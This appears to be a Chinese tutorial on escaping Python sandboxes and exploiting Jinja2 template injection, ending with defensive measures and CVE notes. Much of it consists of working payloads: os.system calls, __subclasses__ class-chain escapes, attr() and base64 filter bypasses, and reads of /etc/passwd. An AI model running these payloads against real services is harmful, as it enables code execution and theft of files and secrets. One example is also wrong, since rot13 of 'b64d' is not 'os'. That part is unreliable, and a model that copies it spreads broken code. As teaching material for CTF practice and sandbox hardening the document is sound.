沙箱逃逸(Python沙盒逃逸深度解析)
一、沙盒逃逸的核心目标
执行系统命令
通过调用os.system、subprocess.Popen等函数执行Shell命令,例如读取文件或反弹Shell。
文件操作
读取敏感文件(如/etc/passwd)、写入后门文件。
环境信息泄露
获取沙盒配置、环境变量或密钥(如__builtins__中的敏感模块)。
二、常见攻击链与利用方法
探测沙盒漏洞
基础测试:注入{{7*7}}或__import__(‘os’).system(‘id’)验证模板引擎动态执行能力。
检查内置对象:通过dir()或__builtins__查看可用模块。
访问危险函数
直接调用模块:若未禁用os,直接执行命令:
__import__('os').system('cat /flag')
间接导入:通过字符串编码绕过关键字过滤:
__import__('b64d'.decode('rot13')).system('id') # 'b64d'→'os'
类继承链利用
遍历子类:从基础类(如object)通过__subclasses__()找到危险类:
''.__class__.__mro__[-1].__subclasses__()[X].__init__.__globals__['os'].system('id')
其中X为os._wrap_close或subprocess.Popen的类索引。
利用文件对象:通过types.FileType或open读取文件:
types.FileType('/etc/passwd').read()
绕过过滤的技巧
属性链分割:使用getattr或|attr()绕过点号过滤:
request|attr('application')|attr('__globals__')['os'].system('id')
编码混淆:Base64、ROT13编码命令字符串:
eval('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2lkJyk='.decode('base64'))
利用内联函数:通过timeit、platform等非敏感模块间接调用命令:
timeit.timeit("__import__('os').system('id')", number=1)
三、典型沙盒环境与绕过案例
Jinja2模板引擎SSTI
漏洞场景:直接渲染未过滤的用户输入,如render_template_string(user_input)。
利用链:通过{{config}}泄露密钥,或通过类继承链调用os模块。
RestrictedPython沙盒
限制机制:禁用__import__、open等函数。
绕过方法:利用__builtins__.__dict__或_getattr_动态获取危险函数。
CTF题目实战
常见考点:通过__subclasses__找到warnings.catch_warnings类,其__init__的全局变量包含sys模块。
文件读取绕过:使用
().__class__.__bases__[0].__subclasses__()[40]('/etc/passwd').read()。
四、防御措施与最佳实践
禁用高危函数
在沙盒配置中移除eval、exec、os、subprocess等模块,例如:
__builtins__.__dict__.clear() # 清除内置函数
限制模块导入
白名单机制:仅允许预定义的模块和函数。
沙盒环境:使用RestrictedPython或PyPy沙盒,限制全局状态访问。
输入过滤与静态模板
正则过滤:拦截{{、__class__、__import__等敏感符号。
静态渲染:优先使用render_template而非动态拼接模板。
监控与加固
日志审计:记录异常代码执行行为。
容器隔离:将沙盒运行在Docker等隔离环境中,限制资源访问。
五、历史漏洞与扩展
CVE-2017-5524:Plone CMS因未过滤Python字符串格式化方法导致沙盒绕过,攻击者可泄露敏感数据。
Temporal沙盒绕过:通过sandbox_unrestricted()上下文管理器或禁用@workflow.defn(sandboxed=False)完全绕过防护。